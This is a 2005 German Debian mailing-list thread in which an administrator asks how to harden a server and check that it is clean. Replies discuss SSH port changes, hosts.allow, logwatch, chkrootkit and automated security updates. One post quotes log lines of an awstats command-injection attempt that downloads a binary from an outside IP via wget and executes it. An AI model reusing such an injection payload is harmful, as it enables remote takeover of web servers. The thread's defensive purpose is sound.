Re: Angriff auf server - alles dicht?

2005-12-26 Diskussionsfäden Christian Schmidt
Hallo Gerhard,

Gerhard Gaussling, 23.12.2005 (d.m.y):

 Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten 
 Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su.
 Wie habt ihr euren server abgesichert? 

Der sshd nutzt die libwrap; man kann also in /etc/hosts.allow und
/etc/hosts.deny festlegen, welche Netze via SSH zugreifen duerfen.

...ein kleiner Baustein in der Mauer. ;-)

Gruss,
Christian Schmidt

-- 
Was tun, wenn die Uhr stehen bleibt? Weitergehen, einfach weitergehen!


signature.asc
Description: Digital signature


Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Gerhard Gaussling
Hallo,

ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich 
durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren 
Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei.

Es scheint mir aber trotz häufiger Versuch nie ein erfolgreichjer 
Angriff dabei zu sein. 

Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten 
Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su.
Wie habt ihr euren server abgesichert? 

Ich benutze logcheck - filtern geht hier nicht, da es sich um einen 
virtuellen server handelt, soll aber ja auch nicht sinnvoll sein, wenn 
es sich bei dem Rechner nicht um eine explizite Firewall handelt. 

Womit untersucht ihr, ob der server noch clean ist?

ciao

Gerhard


Hier mal so eine logcheck mail, mit 401 und 404 Fehlern, von dort gehen 
dann ja wohl keine Gefahren aus (ist ziemlich regelmäßig, dass das 
versucht wird, genauso wie die ssh Einlog-Versuche): 
[...]
[ip.ip.ip.ip] - - [23/Dec/2005:00:07:15 +0100] 
GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
  
HTTP/1.1 401 479 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1;)
[ip.ip.ip.ip] - - [23/Dec/2005:00:07:19 +0100] 
GET /cgi-bin/awstats/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
  
HTTP/1.1 404 302 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1;)
[Fri Dec 23 00:07:10 2005] [error] [client 62.4.80.149] File does not 
exist: /var/www/blogs/xmlsrv/xmlrpc.php
[...]
[Fri Dec 23 00:07:19 2005] [error] [client 62.4.80.149] script not found 
or unable to stat: /usr/lib/cgi-bin/awstats
[...]



Re: Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Andreas Pakulat
On 23.12.05 12:25:49, Gerhard Gaussling wrote:
 ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich 
 durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren 
 Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei.

404 und 401 sind ja nur Meldungen deines Servers, dass die Seiten nicht
gefunden wurden. Solange nicht jemand versucht damit ne DOS-Attacke zu
fahren...

 Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten 
 Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su.
 Wie habt ihr euren server abgesichert? 

Gegen das ssh-Anklopfen hilft den sshd auf nen anderen Port umzuziehen.
Das ist genauso sicher/unsicher wie auf Port22 aber das Log wird nicht
so zugeschuettet mit den ollen Script-Einbruchsversuchen...

Ansonsten laeuft bei mir logwatch und ausser sshd momentan eh nichts
weiter auf dem externen NIC. Demnaechst wird Apache angeschaltet, fuers
erste wohl nur fuer ein Subversion-Repository. Da wirds dann nur https
geben und Zugriff ueber Login.

 Ich benutze logcheck - filtern geht hier nicht,

logcheck produziert mir zuviel Output, da finde ich logwatch besser. Da
sieht man immernoch Unregelmaessigkeiten, denke ich, und kann dann bei
Bedarf direkt die Logdateien lesen. Beim logcheck-Output weiss ich das
ich das nicht lange mitmache den jeden Tag zu lesen...

 Womit untersucht ihr, ob der server noch clean ist?

Bisher gar nicht. Man koennte wohl vllt. so ein checkrootkit-Dingens
laufen lassen, mal schauen..

Andreas

-- 
You prefer the company of the opposite sex, but are well liked by your own.


-- 
Haeufig gestellte Fragen und Antworten (FAQ): 
http://www.de.debian.org/debian-user-german-FAQ/

Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED]
mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)



Re: Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Gerhard Gaußling
Am Freitag 23 Dezember 2005 13:15 schrieb Andreas Pakulat:
 logcheck produziert mir zuviel Output, da finde ich logwatch besser.
 Da sieht man immernoch Unregelmaessigkeiten, denke ich, und kann dann
 bei Bedarf direkt die Logdateien lesen. Beim logcheck-Output weiss
 ich das ich das nicht lange mitmache den jeden Tag zu lesen...

Ja, das müsste ich auch mal wieder anpassen/filtern, momentan - nach 
einem upgrade - kommt scheinbar jeder servwerzugriff durch, das hatte 
ich schonmal komplett weggefiltert. Jetzt bekomme ich stündlich mails. 
Früher war ich schon mal auf 1-3x/tag - alle 3 tage runter.

logwatch werde ich mir mal ansehen.

  Womit untersucht ihr, ob der server noch clean ist?

 Bisher gar nicht. Man koennte wohl vllt. so ein checkrootkit-Dingens
 laufen lassen, mal schauen..
Hmmm.. da gibtr's auch immer false positives, wobei ich hier nmicht 
weiß, wie man das wegfiltert (procmail?).

/etc/cron.daily/chkrootkit:

/usr/lib/cgi-bin/.htaccess

You have 1 process hidden for readdir command
You have 1 process hidden for ps command
SIGINVISIBLE Adore found
Warning: Possible LKM Trojan installed
/proc/1/fd: Permission denied
eth0:vserver821: PACKET SNIFFER((null)[(null)], (null)[(null)])

Letzte Zeile kann ich nicht einschätzen, aber Adore/LKM ist ein false 
positive. Diese null/null Geschichte ist irgendwann aufgetaucht, hängt 
aber glaube ich mit einem upgrade/installation zusammen.

Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus?
Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren 
vor, das ein wichtiges Sicherheits Update erst eine Woche später 
eingespielt wird.

tripwire etc. ist wohl mit Kanonen auf Spatzen geschossen, oder?
Eine automatische Backuplösung wäre natürlich auch noch wichtig...
aber das ein anderes mal.

ciao

Gerhard



Re: Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Andreas Pakulat
On 23.12.05 13:46:09, Gerhard Gaußling wrote:
 Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus?
 Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren 
 vor, das ein wichtiges Sicherheits Update erst eine Woche später 
 eingespielt wird.

Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht
dazu gekommen.  Damit kriegst du dann immer ne Mail wenn updates
anstehen.

Andreas

-- 
Your boyfriend takes chocolate from strangers.


-- 
Haeufig gestellte Fragen und Antworten (FAQ): 
http://www.de.debian.org/debian-user-german-FAQ/

Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED]
mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)



Re: Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Paul Puschmann
Andreas Pakulat wrote:
 On 23.12.05 13:46:09, Gerhard Gaußling wrote:
 
Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus?
Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren 
vor, das ein wichtiges Sicherheits Update erst eine Woche später 
eingespielt wird.
 
 
 Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht
 dazu gekommen.  Damit kriegst du dann immer ne Mail wenn updates
 anstehen.
 
Apticron funktioniert bei mir sehr gut. Installieren und fertig.

Paul
-- 
Linux-User #271918 with the Linux Counter, http://counter.li.org/



signature.asc
Description: OpenPGP digital signature


Re: Angriff auf server - alles dicht?

2005-12-23 Diskussionsfäden Andreas Pakulat
On 23.12.05 15:02:13, Paul Puschmann wrote:
 Andreas Pakulat wrote:
  On 23.12.05 13:46:09, Gerhard Gaußling wrote:
  
 Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus?
 Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren 
 vor, das ein wichtiges Sicherheits Update erst eine Woche später 
 eingespielt wird.
  
  
  Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht
  dazu gekommen.  Damit kriegst du dann immer ne Mail wenn updates
  anstehen.
  
 Apticron funktioniert bei mir sehr gut. Installieren und fertig.

Will aber iproute und libatm1 installieren, dann lieber cron-apt das hat
keine weiteren Abhaengigkeiten.

Andreas

-- 
Don't get to bragging.


-- 
Haeufig gestellte Fragen und Antworten (FAQ): 
http://www.de.debian.org/debian-user-german-FAQ/

Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED]
mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)